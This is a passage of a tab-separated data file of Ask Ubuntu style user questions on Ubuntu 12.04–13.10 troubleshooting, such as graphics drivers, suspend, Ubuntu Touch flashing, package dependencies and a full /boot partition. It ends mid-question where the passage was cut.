362474	dell xps 17 l702x nvidia gt 555m ( optimus )	i know there are some topics about getting nvidia drivers to work on the dell xps 17 ( l702x ) . i have read them all and tried several approaches . every time it results in re-installing ubuntu because it won´t boot anymore . i really like ubuntu and don´t want to go back to windows even if i can´t get the video drivers installed . i just reinstalled ubuntu 13.04 on my system , what do i do step by step to get the drivers running on my system ? kind regards , paul
362476	problem with installation via virtual box	i actually was able to install ubuntu successfully using virtual box but when the installation completes , it says you need to restart if i do so then the virtual box closes saying some error occurred.please help .
362480	i ca n't upload photo 's off my card from my kodak camera	everything was working fine and suddenly it stopped allowing my to upload photo 's from the card ...
362481	what will happen if i will terminate the update in between ( from the terminal )	so i use computer for unknown time . sometimes i use it for more than 3 hr . and sometimes lesss than half hour . what will happen if i will stop the update from the terminal when the packages are being q1- downloaded ? q2- installed ?
362482	how can i make window movement more precise while dragging ?	i 'd like to know if i can make the dragging of windows/items on the screen more precise . as of , the dragging of windows is very vague . for instance , it 's as if the window has some sort of virtual friction , and causes the window to be a bit sloppy , the mouse cursor often overtakes the window and window follows behind . it 's not lagging or being choppy at all , it 's just sloppy movement . window movement on os x 10.8 on the same computer is smooth and precise , the window stays with the cursor exactly . and the same happens on windows too . now , if it 's possible , could i improve this sloppiness or just make it more precise than it is now . i am using ubuntu gnome , with gnome 3.10 , this happens on all versions of gnome iâve tried too . thanks in advance ! edit : i have researched , but i have not found any answers . and i have no idea where to start myself ... thanks again .
362483	need help choosing an install version	i have an old laptop i want to install on its a 32bit system and does not appear to have pae ( at least that 's the message i get when trying to install ) can someone please point me in the right direction for an install that will work on my system please ?
362484	gnome-shell : command to launch message tray	how can i launch message tray in gnome-shell . i mean is there any keyboard shortcut i can use ? i am using gnome shell 3.8.4 version with ubuntu 13.10 . thank you . already seen here : gnome 3 shell keyboard/mouse shortcuts but i did n't found that .
362495	creative x-fi titanium crackling sound on ubuntu 12.04	i have crackling sound whenever i play a video on my browser or normal video on media player . it also happens when using a daw . but it is normal when i play a game . i searched the internet but nothing similar came up . does anyone have this issue ?
362496	vdpau on ubuntu 13.10 and mesa 9.2.1	i 've just installed ubuntu 13.10 . i have a radeon hd 4570 card and i want to use the hardware acceleration capabilities that were introduced with linux 3.10 in the mesa 9.2 so my question is : since i have a linux 3.11 and mesa 9.2 , do i really need to compile the mesa library with -- enable-vdpau option enabled ? i have installed the libvdpau from the repository but no acceleration . should i compile and then install the latest mesa ( i do n't want to mess my newly installed ubuntu 3.10 ) ? thanks !
362498	phablet-flash aborting while installing ubuntu touch on nexus 4	i have a nexus 4 with android 4.3 installed and i want to flash it to ubuntu touch . my system is ubuntu 12.04 , running inside a virtual machine on mac os 10.5.8 . to use the vm , i opened an nat bridge and forwarded port 5037 for adb , i can see the nexus with adb and e.g . use the adb shell into it . usb ports are also forwarded to the vm . i follow these instructions to the letter . my bootloader is unlocked , just as it was described in the instructions . now i encounter different issues , when executing sudo phablet-flash ubuntu-system -- no-backup . on the first run , it got stuck in this state : info : phablet-flash : decompressing partitions/recovery.img from /home/till/downloads/phablet-flash/imageupdates/pool/device-5ba3031cb0d6fc624848266edba781e3e821b6e1e8dd21105725f0ab26077d0a.tar.xz info : phablet-flash : restarting device ... wait info : phablet-flash : restarting device ... wait complete info : phablet-flash : booting /tmp/tmpmsn8bm/partitions/recovery.img < waiting for device > downloading 'boot.img ' ... okay [ 1.772s ] booting ... okay [ 0.005s ] finished . total time : 1.779s info : phablet-flash : waiting for recovery image to boot the following happened : around the line `` info : phablet-flash : restarting ... '' , it rebooted into the bootloader . the bootloader shows only for two seconds , then the screen goes off and the phone stays off . but i do notice , that the screen is not off - it is just black , but the background light is on . if i wait long enough , phablet-flash aborts with error : phablet-flash : wait for recovery expired on the second try , i wanted to manually start the bootloader and choose `` recovery mode '' . pressing `` volume down+power '' at first did nothing . releasing the buttons and then pressing them again brought me into the bootloder . after choosing `` recovery mode '' , phablet-flash continued and after a while aborted with the following output : info : phablet-flash : wait for recovery image to boot complete info : phablet-flash : clearing /data and /cache info : phablet-flash : pushing /home/till/downloads/phablet-flash/imageupdates/pool/ubuntu-2b5345658b58e55207c4a4e7b6b3d8cd4f3d9a3187d2448fc9020c884234bac0.tar.xz to /cache/recovery/ failed to copy '/home/till/downloads/phablet-flash/imageupdates/pool/ubuntu-2b5345658b58e55207c4a4e7b6b3d8cd4f3d9a3187d2448fc9020c884234bac0.tar.xz ' to '/cache/recovery/ ' : permission denied error : phablet-flash : command 'adb push /home/till/downloads/phablet-flash/imageupdates/pool/ubuntu-2b5345658b58e55207c4a4e7b6b3d8cd4f3d9a3187d2448fc9020c884234bac0.tar.xz /cache/recovery/ ' returned non-zero exit status 1 removing directory /tmp/tmpdnbz6n removing directory /tmp/tmpth4l6w what can i do to properly flash my phone with ubuntu touch ? i noticed that adb does not show the phone in recovery mode : typing adb devices , when the nexus 4 is in recovery mode , shows the serial number and the state device , where it should show recovery . should the phone be rooted ? this is not mentioned in the instructions .
362500	ubuntu 13.04 desktop slow on virtual box	i have installed ubuntu 13.04 desktop on virtual box 4.2.12 . the system has poor performance . my specifications are ram 3 gb cpu 1 core video memory 128 mb storage 20 gb i was enthusiastic about ubuntu , but the performance depressed me .
362502	what is the simplest way to backup my ubuntu-touch playground image	i 'm using ubuntu 12.04 and nexus 4 [ mako ] and all went fine with installation . changing the image with some usual stuff for me i would like to : 1 . backup the image 2 . reuse it with phablet-flash command
362505	`` application finder '' default to expanded ?	is there a way to configure `` application finder '' to open in expanded view ? ( xubuntu 13.10 )
362506	deep sleep and suspend not working	i am using ubuntu 13.10 on my dell inspiron 15- 3521 ( non touch ) . the problem is deep sleep even suspend initially it works that is laptop enters deep sleep and even suspend initialy works but then waking up the screen i get a blackscreen which stays infinitely untill i long press power button and switch it off and then switch it on using same button . can someone please help me ? i would really appreciate it
362507	i want to return my computer to factory settings from windows . 多how do i uninstall ubuntu to avoid any conflict ?	as maybe we all know , windows gets slower with the time , ( it does n't happen in ubuntu ) and due to this i want to 'restart ' my laptop , from windows to the default settings when it was new , using the backup software that my laptop include . i have done that before i installed ubuntu , but now i think doing it will arise some conflicts due to the partitions . so first , i want to uninstall ubuntu , ( which in fact is a little untidy because it was the first time i installed it and i use it to experiment , for example i did n't install the home folder in another partition ) , then restart the laptop with default factory settings to fix windows , and then install ubuntu again . so , it is necessary to uninstall ubuntu before i return my laptop to factory settings ? if it is necessary , how do i uninstall it properly ? is there any way to only reinstall ubuntu without affecting windows ? thanks in advance ...
362508	no root file system defined error in ubuntu 13.10 installation	i have installed ubuntu 13.10 along with windows 7 without creating any new partition . i am using a bootable pendrive to do so and the installation completes succesfully in the same drive in which windows is installed . but when the pc restarts to complete the installation this error shows up ! ! this same thing is successfully completed in another pc but in my pc it is showing an error . pls help as i dont want to create a new partition and dont want to run it as a live cd .
362510	struck with a serious issue when upgrading to ubuntu 13.10 from 13.04	i installed ubuntu 13.04 alongside windows xp professional . when i tried to upgrade to 13.10 from 13.04 , it took some time to download and then it started cleaning the files and then message was displayed that xp cleaned ( this msg was seen by my younger brother and then he cut the power off ) . now the computer when starts displays this screen and i dont know how to proceed . to anyone giving solution i would like tell you that i prefer xp over linux ( personal reasons ) . so is there any way to get out of this problem , i neither can open xp nor linux ? sorry , i was tensed , please understand my situation , really sorry for that , here is what i meant : this is what i am getting when i start my pc
362511	ubuntu will not install with dual boot	i have a desktop with a 1 tb hd and win 7 installed . when i try to install ubuntu as a dual boot system the only option it allows is to write over win 7 . i 've installed dual boot versions on other computers with no problems .
362512	installing ubuntu 13.10 on vmware 10 workstation ( windows 7 x64 )	does anyone know a step by step installing guide to install ubuntu 13.10 on vmware 10 workstation ?
362513	what software can i use to download torrents	i just installed ubuntu 13.10 , saucy salamander . i would like to install a different linux distribution , but all of my download crash . i want to use a torrent instead . what software can i install to download torrents in ubuntu ? i used utorrent in windows 8 but i do n't think they have that for ubuntu .
362514	problem with wireless connection	i bought a pre-installed ubuntu laptop with 12.04 . it used to detect the wireless connections . but due to some problems in my wifi , i inserted the net cable directly into the laptop . since then , there is no option for wireless connections . when i used rfkill list all it showed me that bluetooth and wireless is hardblocked . when i pressed the keyboard button for wifi , the hardblock turns off for both bluetooth and wireless . in short , the wifi key turns bluetooth and wifi on and off . but still it does n't show any wireless connection . nothing ... please help . tried all the methods on ubuntu forums like rfkill unblock all , sudo wireless service start , but it does n't work .
362515	how can i get sound input with chrubuntu 12.04 on a samsung 5 series chromebook ?	i have chrubuntu 12.04 running on my samsung chromebook 5 series . it uses the custom chrome os kernel compiled for 64 bit ( the chrome os on these older chromebooks has reverted back to 32 bit although 64 bit can run , likely less stable ) . sound output , adobe flash , and trackpad work fine , but the input device is not seen . has anyone seen this issue ? is there a fix for it ?
362518	extend time before going to login screen ubuntu 13	i do n't mind having to log back into my laptop but can i extend the time somehow before it goes back to the login screen ? it goes back to login too quickly .
362521	error in installing a theme in ubuntu 13.10	i just upgraded to ubuntu 13.10 3 days ago and since then i 've been trying to install a couple of themes for example i tried moka theme and many more.whenever i try to install a theme when ever i add the ppa : and after that i type sudo apt-get update its shows this : w : failed to fetch http : //ppa.launchpad.net/jolicloud-team/ppa/ubuntu/dists/saucy/main/binary-i386/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/webupd8team/jupiter/ubuntu/dists/saucy/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
362524	ubuntu 13.10 upgrade error . dropping to low graphics mode	i was updating from the terminal and it was complete . it asked me if i would like to reboot now . i accidentally pressed 't ' instead of 'y ' and then it just asked me to reboot manually . then i rebooted using sudo shutdown now -r and on reboot , the system flashed the `` low graphics mode '' error screen and its stuck there . i have 13.10 live-usb with me . is there any way i can get my system to boot normally ? i 'm not willing to do a fresh install as i had installed several other packages . another question : is there any diff if i drop into terminal using alt+ctrl+f1 or if i use chroot from a live session ?
362526	ubuntu thinks i have two displays	when i first installed ubuntu i noticed that my mouse would flicker a lot , which caused me to investigate . i remembered back when i ran fedora i had an issue where it thought i had two displays ( hp-dv7 4285dx laptop ) . in fedora , this did n't cause any issues . in ubuntu , it causes the mouse the flicker a lot . the fix i 've been using is to just go into settings > displays and disable the display that does n't actually exist . the only problem is that this is not permanent . each time i start up ubuntu , i have to go back in and disable this display . they 're each just titled `` built-in display '' , and have the same resolution . my laptop does have two graphics cards : one on-board and one dedicated . i 'm not sure if maybe that is causing is an issue ? any guidance towards this would be great . thanks !
362528	sudo not available in guest login	when i login as guest i am unable to execute any command with sudo . e.g . : sudo ps returns : sudo : unable to change to sudoers gid : operation not permitted how can i fix this ?
362534	ca n't install ubuntu software center	i 'm running ubuntu 13.10 32bit with gnome 3.8 but am missing the ubuntu software center . i tried to install it via terminal : $ sudo apt-get install software-center but that tells me that dependencies are not met the following packages have unmet dependencies : software-center : depends : gir1.2-webkit-3.0 but it is not going to be installed gir1.2-webkit-3.0 depends on gir1.2-javascriptcoregtk-3.0 of version 1.10.2-0ubuntu2 . but that package is only available as version 2.0.4-2~ubuntu13.04 . i am missing the ubuntu software center as well as the update manager and the packages update-notifyer and ubuntu-release-upgrader-gtk . how can i install the packages with correct dependencies ? edit : output of apt-cache policy gir1.2-javascriptcoregtk-3.0 : gir1.2-javascriptcoregtk-3.0 : installed : 2.0.4-2~ubuntu13.04.1 candidate : 2.0.4-2~ubuntu13.04.1 version table : *** 2.0.4-2~ubuntu13.04.1 0 100 /var/lib/dpkg/status 1.10.2-0ubuntu2 0 500 http : //de.archive.ubuntu.com/ubuntu/ saucy/main i386 packages my sources.list : deb http : //de.archive.ubuntu.com/ubuntu/ saucy main restricted universe multiverse deb http : //de.archive.ubuntu.com/ubuntu/ saucy-security main restricted universe multiverse deb http : //de.archive.ubuntu.com/ubuntu/ saucy-updates main restricted universe multiverse deb http : //archive.canonical.com/ubuntu saucy partner deb http : //extras.ubuntu.com/ubuntu saucy main # spotify deb http : //repository.spotify.com stable non-free spotify i added myself .
362539	how to use the new keyboard switcher	the keyboard switcher no longer works for me ; i used to switch between keyboard layouts ( from english to other languages ) the same way as i do on windows , using alt-shift . it no longer seems to accept this combination , and i ca n't figure out how to set this up . is this a known bug ?
362540	gnome-control-center crashing after i try to access network settings	im having serious problems after installing ubuntu 13.10 . i can not access my network settings under system settings . whenever i try to access network settings , the settings app crashes off . this is the output it produces when i run it from the terminal : kelvine @ kelvinelove : ~ $ sudo gnome-control-center [ sudo ] password for kelvine : ( gnome-control-center:4595 ) : ibus-warning ** : the owner of /home/kelvine/.config/ibus/bus is not root ! ** network-cc-panel : error : rfkill-glib.c:83 : type_to_string : code should not be reached kelvine @ kelvinelove : ~ $ how can i resolve this error ? ?
362541	can not install everpad on ubuntu 13.10	i wanted to install everpad on ubuntu 13.10 when i entered the ppa it says that 13.10 is supported everpad ppa when i tried to install it this is what i get reading package lists ... done building dependency tree reading state information ... done e : unable to locate package everpad any ideas how to fix this ? ?
362542	udhcpc.conf help	hi i know the question is vague but bear with me , my goal is to learn and the problem at hand is just to mess around . so please if you can point me in the direction for a good read , i really just wnt to learn . i honestly have searched alot for this problem . and learned alot . problem : i am trying to set up a wifi hotspot with 1 wifi adapter . i followed the first tutorial i found ( and i want to get this version working because i feel i understand it well ) this one : how do i create a wifi hotspot sharing wireless internet connection ( single adapter ) ? ( scroll down ) i think i understand all of it ( obviously i dont ) the only thing i can add to what i read is that since im using kde i need to edit the line pkill -15 `` nm-applet '' with pkill -15 `` network manager plasma '' ( since i use kde and otherwise i dont get a mac addr assigned ) anyway other than that i basically followed it letter for letter since it was appropriate . i did not understand udhcpc and udhcpd however : ( i know ( i think ) that this assigns the ipaddress and such . but im not to sure how to configure it . i went to my routers site and broswed around and used that subnet ? anyway my .conf file is this : start 192.168.1.140 end 192.168.1.160 interface new1 opt dns 192.168.1.1 option subnet 255.255.255.0 opt router 192.168.1.139 option domain localhost the reason i think this configuration is the problem is because the error i get is `` lease failed '' when my phone asks for an ipaddress . it passes the authentication so thats good . but even tho its connected i obviously get no internet . this is my konsole ( after connection is made ) : sending discover ... sending discover ... /etc/udhcpc/default.script : lease failed . sending discover ... etc ... sorry if this is a dumb question , its only my second day on linux . but i love it . i use an eee pc 1005hab . also i would really like to thank everyone who contributes , i wish you knew how indebted i am to you . i have been coding since i was a kid and plan on somehow contributing to this community . you are so awesome : )
362544	full system hard drive backup options	i 'm relatively new to ubuntu and alreday i managed to wreck it several times that i had to fully reinstall it . i need a robust solution to clone the whole hdd so that no matter how bad the damage - i 'd still be able to recover it fully from the last backup . i 've looked into clonezilla , but if i understand it correctly you need to boot it so you could clone/backup/recover the whole hdd which is a bit tedious as an everyday task . is there a more automated solution that would do what clonezilla does - backup the whole system hard drive for later recovery if needed ? this must work even in the event of physical disk damage without the need of re-installation .
362548	audio playing too fast on lubuntu 13.10	i did a total reset of my netbook ( asus eee pc 1201ha ) and i installed lubuntu 13.10 . the matter is that , whatever player i use , my music files are always played too fast . how can i change this ?
362549	how to disable all scopes , filters and dash plugins ?	the dash is overloading me with stuff i do n't need , down to the weather and food recipes ( ? ! ) when i 'm just looking for a file or app . also i ca n't figure out how to set it to include music files without getting results from files i do n't even have . is there a way to go back to how it worked in 13.04 , where the app launcher actually launches apps ? ( so get rid of all the filters , especially results that have nothing to do with my computer . ) it also just does n't seem to work ; i go through the list of filters trying to click everything off , but then i type something to search for and it turns it back on ?
362552	i have to open recovery every time	when starting my computer , i see every time purple screen and caps lock blinking . i have to power-off it and open recovery , select root in menu and write reboot after i could get a normal booting . but every time . no exception . i tired of doing it . installed programs chrome skype i did n't update it . ubuntu 12.10
362556	why ca n't i shut down after installing ubuntu-desktop from minimal cd ?	because my cd drive just could n't burn the 707 mib iso , i : installed ubuntu from the minimal cd and then added the gui via sudo apt-get install -- no-install-recommends ubuntu desktop now my system boots to the ubuntu 's unity desktop all fine , but the menu bar at the top is missing the shutdown button and notification area . i could n't find anything obvious amongst the recommended packages , so what am i missing ? edit : screenshot :
362558	will i be able to install ubuntu on htc one ?	is there any comparability with the htc one in the future ? i 'd love to give it a try but at this point it 's so new that i 'm sure my questions would not be answered very fast either ... may be later ?
362559	num lock function has changed after upgrading to ubuntu 13.10	i faced a strange function i installed ubuntu 13.10 and all the time the number pad on the right of my keyboard is typing number without pressing num lock and when i turn it on it does the job when num lock is normally off . does anyone have this problem ? and any idea how to fix it ?
362565	how to connect quassel via ppp network interface while chromium via wlan at same time ?	i have 2 different network interfaces at same time ( wlan and ppp ) . but the wlan ( public wifi hotspot ) always blocks irc port . so i can not use my quassel when connected in wlan . then i want : my quassel - > ppp - > internet my chromium - > wlan - > internet when i connected to those 2 interfaces . what is the correct technical name of my question ? load balancing , routing , bonding , binding , or else ? can i do it ? if can , how can i do it ? if not , is there any closer solution ? thank you .
362566	how do i perform an installation with raid1 hdds and two ssds ?	i have a setup with 2 hdds ( 1tb ) , 2 ssds ( 32gb and 120gb ) and 16gb ram , and i want to do the following : put the two hdds in a raid 1 for redundancy , and use that volume for the bulk of file-saving , media , apps , etc . plan on mounting / here in order to have most of my system backed up . setup the 32gb ssd for swap , and most system-stuff that typically are n't written that much to , like for instance /boot or wathever files make sense to put here , tips appreciated . 16gb ram is typically more than i need , so i 'm wondering about using some of it as a ram-disk , and place /tmp ( and /proc and other cahce-stuff as well ? ) and similar there to increase performance without wearing out my ssds . problem is that i do n't , at the moment , know all the tools needed for this well enough , and neither do i have a good enough overview of the file-system to identify and place everything where i should go according to how i want the setup to be like . so in short , i want to know : detailed technical descriptions and advice on how to do this . links to tutorials or similar are fine too , provided they are relevant enough of course . additional tips on which folders and files should go where . if it 's possible to somehow backup the files that would be placed on the ssd , outside of the raid , to the raid for total security in regards to data-loss ? ( do n't want to loose the boot-loader of course ) . ps : if some of you wonder about the 120gb ssd , i 'm planning on using that for some games and some other programs where i need quick access-times to disk , not just ram . but i might consider moving some of the files planned for the 32gb ssd there if it makes more sense . i 'm planning to use ubuntu 13.10 . thanks for any helpful answers : )
362568	trying to install ubuntu for nexus unable to locate package	i am trying to install on my nexus 10 ubuntu . but every time i try to install ubuntu @ ubuntu : ~ $ sudo apt-get install phablet-tools android-tools-adb android-tools-fastboot reading package lists ... done building dependency tree reading state information ... done e : unable to locate package phablet-tools e : unable to locate package android-tools-adb e : unable to locate package android-tools-fastboot this appears . could you please help me thanks
362574	ubuntu os on nexus 4 failed	i was trying to install ubuntu os on my nexus 4 , everything downloaded just fine . after that it started booting into boot.img and that 's where the issues started . here 's what i got on screen : info : phablet-flash : booting /tmp/tmpbt_cj5/partitions/recovery.img downloading 'boot.img ' ... okay [ 1.085s ] booting ... okay [ 0.004s ] finished . total time : 1.088s info : phablet-flash : waiting for install to finish on device . please do not unplug device until phablet-flash finishes . error : phablet-flash : installation is taking too long or an error occured along the way . removing directory /tmp/tmpbt_cj5 removing directory /tmp/tmpsmhqaw before installation failed the screen was black for around 10 minutes on my phone . i can boot into bootloader and recovery mode but i do n't know what to do to either finish installing ubuntu or to revert to android 4.3 .
362580	unable to reinstall 13.04 , option missing from livecd	i want to reinstall 13.04 over my current installation ( while keeping my files ) . from various other questions here , there is supposed to be an option on the live cd to `` reinstall ubuntu 13.04 '' ( as shown here and here ) . here is what i see : i tried choosing `` something else '' as suggested in this question . i select the partition with my current ubuntu installation on it , but then i get an error , `` no root file system is defined '' . here is the screen : what am i missing here ? how do i reinstall ubuntu ?
362581	not working nvidia gt 635m drivers	i 'm having problems trying to use my nvidia 635m in my asus n46vj laptop . i open the `` nvidia x server settings '' i get this message : '' you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run nvidia-xconfig as root ) , and restart the x server . '' i open the terminal typi `` sudo nvidia-xconf '' and this creates a file , /etc/x11/xorg.conf after reboot i 'm in a lower resolution of 640x480 , without other options to change it , then open the details system and it shows me this in the graphic item : intel速 ivybridge mobile i type this in the terminal ( no idea what that means , i just saw it in a forum ! ! ! ) lspci -vnn | grep '\ '' [ 030 [ 02 ] ] ' and get this : 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) ( prog-if 00 [ vga controller ] ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gf108m [ geforce gt 635m ] [ 10de:0de3 ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) i installed bumblebee but nothings happens additionally the additional drivers shows me `` no propietary drivers are in use on this system ''
362583	why ca n't i log into lubuntu after the 13.04 update , even if i know the password ?	after the 13.04 update the login screen started to appear , even though i chose to automatically login in the lubuntu install options one week ago . even if my password and username is correct it wo n't login , it will just come back to the login screen . when i press alt-ctrl-f1 at the login screen i am able to login perfectly , but i have no gui and i 'm kind of lost on that field . what is going ? is it just a bug ? can i downgrade ? i tried several forums with different solutions but none of them worked .
362585	out of disk space - /boot at 100 %	my /boot is at 100 % . when i run aptitude search ~ilinux-image i 'm getting loads of unused images . when i try to delete one of them ( after checking which one is currently in use by doing uname -r ) , e.g apt-get autoremove linux-image-3.2.0-44-generic i get : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-generic : depends : linux-headers-generic ( = 3.2.0.51.61 ) but 3.2.0.54.64 is to be installed linux-server : depends : linux-headers-server ( = 3.2.0.51.61 ) but 3.2.0.54.64 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . and running apt-get -f install throws no space left on device . i 've also tried doing apt-get purge but i am getting the same thing . output of df -h and dpkg -l linux-* . : root @ hb2088 : /srv/www # df -h filesystem size used avail use % mounted on /dev/sda3 9.4g 3.0g 6.0g 34 % / udev 301m 4.0k 301m 1 % /dev tmpfs 124m 228k 124m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 309m 0 309m 0 % /run/shm /dev/sda1 92m 91m 0 100 % /boot root @ hb2088 : /srv/www # dpkg -l linux-* desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description +++-====================================================-====================================================-======================================================================================================================== un linux-doc-3.2.0 < none > ( no description available ) ii linux-firmware 1.79.6 firmware for linux kernel drivers iu linux-generic 3.2.0.51.61 complete generic linux kernel un linux-headers < none > ( no description available ) un linux-headers-3 < none > ( no description available ) un linux-headers-3.0 < none > ( no description available ) ii linux-headers-3.2.0-44 3.2.0-44.69 header files related to linux kernel version 3.2.0 ii linux-headers-3.2.0-44-generic 3.2.0-44.69 linux kernel headers for version 3.2.0 on 64 bit x86 smp ii linux-headers-3.2.0-45 3.2.0-45.70 header files related to linux kernel version 3.2.0 ii linux-headers-3.2.0-45-generic 3.2.0-45.70 linux kernel headers for version 3.2.0 on 64 bit x86 smp ii linux-headers-3.2.0-48 3.2.0-48.74 header files related to linux kernel version 3.2.0 ii linux-headers-3.2.0-48-generic 3.2.0-48.74 linux kernel headers for version 3.2.0 on 64 bit x86 smp ii linux-headers-3.2.0-51 3.2.0-51.77 header files related to linux kernel version 3.2.0 ii linux-headers-3.2.0-51-generic 3.2.0-51.77 linux kernel headers for version 3.2.0 on 64 bit x86 smp ii linux-headers-3.2.0-52 3.2.0-52.78 header files related to linux kernel version 3.2.0 ii linux-headers-3.2.0-52-generic 3.2.0-52.78 linux kernel headers for version 3.2.0 on 64 bit x86 smp iu linux-headers-3.2.0-54 3.2.0-54.82 header files related to linux kernel version 3.2.0 iu linux-headers-3.2.0-54-generic 3.2.0-54.82 linux kernel headers for version 3.2.0 on 64 bit x86 smp iu linux-headers-generic 3.2.0.54.64 generic linux kernel headers iu linux-headers-server 3.2.0.54.64 linux kernel headers on server equipment . un linux-image < none > ( no description available ) un linux-image-3.0 < none > ( no description available ) ii linux-image-3.2.0-44-generic 3.2.0-44.69 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-45-generic 3.2.0-45.70 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-48-generic 3.2.0-48.74 linux kernel image for version 3.2.0 on 64 bit x86 smp if linux-image-3.2.0-51-generic 3.2.0-51.77 linux kernel image for version 3.2.0 on 64 bit x86 smp if linux-image-3.2.0-52-generic 3.2.0-52.78 linux kernel image for version 3.2.0 on 64 bit x86 smp in linux-image-3.2.0-54-generic < none > ( no description available ) iu linux-image-generic 3.2.0.51.61 generic linux kernel image iu linux-image-server 3.2.0.51.61 linux kernel image on server equipment . un linux-initramfs-tool < none > ( no description available ) un linux-kernel-headers < none > ( no description available ) un linux-kernel-log-daemon < none > ( no description available ) ii linux-libc-dev 3.2.0-52.78 linux kernel headers for development un linux-restricted-common < none > ( no description available ) iu linux-server 3.2.0.51.61 complete linux kernel on server equipment . un linux-source-3.2.0 < none > ( no description available ) un linux-tools < none > ( no description available ) output of du -sh /boot/* : root @ hb2088 : ~ # du -sh /boot/* 781k /boot/abi-3.2.0-44-generic 781k /boot/abi-3.2.0-45-generic 781k /boot/abi-3.2.0-48-generic 781k /boot/abi-3.2.0-51-generic 781k /boot/abi-3.2.0-52-generic 139k /boot/config-3.2.0-44-generic 139k /boot/config-3.2.0-45-generic 139k /boot/config-3.2.0-48-generic 139k /boot/config-3.2.0-51-generic 139k /boot/config-3.2.0-52-generic 1.6m /boot/grub 14m /boot/initrd.img-3.2.0-44-generic 14m /boot/initrd.img-3.2.0-45-generic 14m /boot/initrd.img-3.2.0-48-generic 12k /boot/lost+found 174k /boot/memtest86+.bin 176k /boot/memtest86+_multiboot.bin 2.8m /boot/system.map-3.2.0-44-generic 2.8m /boot/system.map-3.2.0-45-generic 2.8m /boot/system.map-3.2.0-48-generic 2.8m /boot/system.map-3.2.0-51-generic 2.8m /boot/system.map-3.2.0-52-generic 4.8m /boot/vmlinuz-3.2.0-44-generic 4.8m /boot/vmlinuz-3.2.0-45-generic 4.8m /boot/vmlinuz-3.2.0-48-generic 4.8m /boot/vmlinuz-3.2.0-51-generic 4.8m /boot/vmlinuz-3.2.0-52-generic
362588	how to install canon pixma mx 454 on ubuntu 12.04	please help i am running ubuntu 12.04 and i would like to install my network printer to it . when i try and install it using the usual route i can see that the system is seeing the printer i search for drivers but none can be found . i then try and select the make and model but the model is not an option in the list . so i suppose i would like to know if it is possible to get this printer working with ubuntu and if so could someone explain how excactly i would be able to do it . thank you very much
362589	intel hd4000 and yet only opengl 3.0 ( ubuntu 12.04 )	i have a laptop with a core i5-3317u cpu , which features a hd4000 chipset ( http : //ark.intel.com/fr/products/65707/intel-core-i5-3317u-processor-3m-cache-up-to-2_60-ghz ) , which normally supports opengl 4.1 . i installed the latest mesa version ( 9.2 development version ) ( from https : //launchpad.net/~xorg-edgers/+archive/ppa ) , which i believe updated nv drivers too , as well as the kernel version xorg-edgers recommended ( which is a 3.8 kernel ) and yet when i run glxinfo : opengl version string : **3.0** mesa 9.2.0 opengl shading language version string : 1.30 is there something else to install ? should i alter my xorg.conf ?
362591	compaq presario 2170ca notebook pc - wo n't reboot , hibernate , shutdown	as the title says , i have a compaq presario 2170ca notebook pc that wo n't reboot , hibernate , or shutdown . i 've been up and down google and launchpad , and i 've tried setting acpi=off and reboot=pci in /etc/default/grub with no positive outcome . it 's the amd version of the laptop , running lubuntu 13.04_x86 i followed this thread , with he same results : http : //ubuntuforums.org/showthread.php ? t=2155043 i just can not get it to go down clean .
362592	open cl devices numbers vs adl device numbers	how can i display the open cl device numbers and then also list the ati display library `` adl '' device numbers and see if for some reason they might be numbering my devices differently ? i get this error : [ 2013-10-20 12:26:47 ] error -1 : getting device ids ( num ) [ 2013-10-20 12:26:47 ] unable to load ati adl library
362596	amd radeon hd 7520g driver not working , graphical glitches	i recently accidentally overwrote my win8 partition while trying to get ubuntu to be dual booted on my laptop . i have no clue how it happened since i had partioned out enough space for not only the os but also for some save files . however ... i may be able to make this work . with steam going to a linux based system for their steam os and the fact that most of the games i play on steam are linux compatible i 'll think about keeping ubuntu as my main os if i can just get all these darned graphical glitches cleaned up and find a working driver for my card . anytime i go to install the catalyst software it just loads up a window ( gedit , i think , linux noob here sorry ) but always winds up just saying it 's not responding . anybody able to point me in the right direction of how to get the propetiary driver installed correctly ? i 'm on version 13.10 . any other information you may need i can get for you . thanks !
362597	suspend/resume issue hp envy m6	: ) i just installed ubuntu 13.10 on my hp envy m6 . when i press the `` power '' button and select to suspend , it looks like it goes to sleep ( power light flashing , as expected ) . when i press the power button to wake it ( or anything else ) , it stops flashing and goes solid ( as it should ) but the screen is black . i tried ctrl+alt+f1 but nothing seems to happen . is there something i can do to get ubuntu to resume from suspend ? edit : i tried getting any updates for ubuntu as well as updating my bios . neither seems to have any effect . edit : tried the 2nd script from ubuntu 12.04 lts suspend fix and it seemed to have no effect . tried the 1st script and now i ca n't seem to suspend at all - ubuntu seems to try to suspend and then immediately goes to the password prompt . with some combination of things i seem to be able to get a new crash , though , involving wpa_supplicant . i allowed it to submit feedback . my wifi seems to be working fine ( i assume this is what wpa is ) . edit : i know this is 'askubuntu ' , but i did try latest linux mint / cinnamon . results were exactly the same ( black screen , power light solid after waking up - just as before , i can make it reboot by mashing ctrl+alt+del but ctrl+alt+f1/etc . does n't work ) . trying ubuntu 12.04 next . edit : ubuntu 12.04 works ! at least it seems to with a quick test . came right back up after suspend . if i do n't have any other problems and no answers are suggested , i 'll make my own answer and accept it . maybe someone can use this information to help troubleshoot the real issue . would be nice to be on the latest version ... but suspend would 've been a deal-breaker for me . hope this info helps someone . edit : installed proprietary ati driver ( not the experimental/beta one ) and the issue is back . i can ctrl+alt+f1 to go to terminal and then sudo stop lightdm , sudo start lightdm which seems to bring me back . the fixes in the forum post did n't fix it either , one prevents machine from suspending the other just does n't seem to have an affect . edit : tried the fix here ati suspend issue but seem to get the same result . i noticed something new ( which may have been there all along ) . though screen is black , if i move the trackpad mouse as 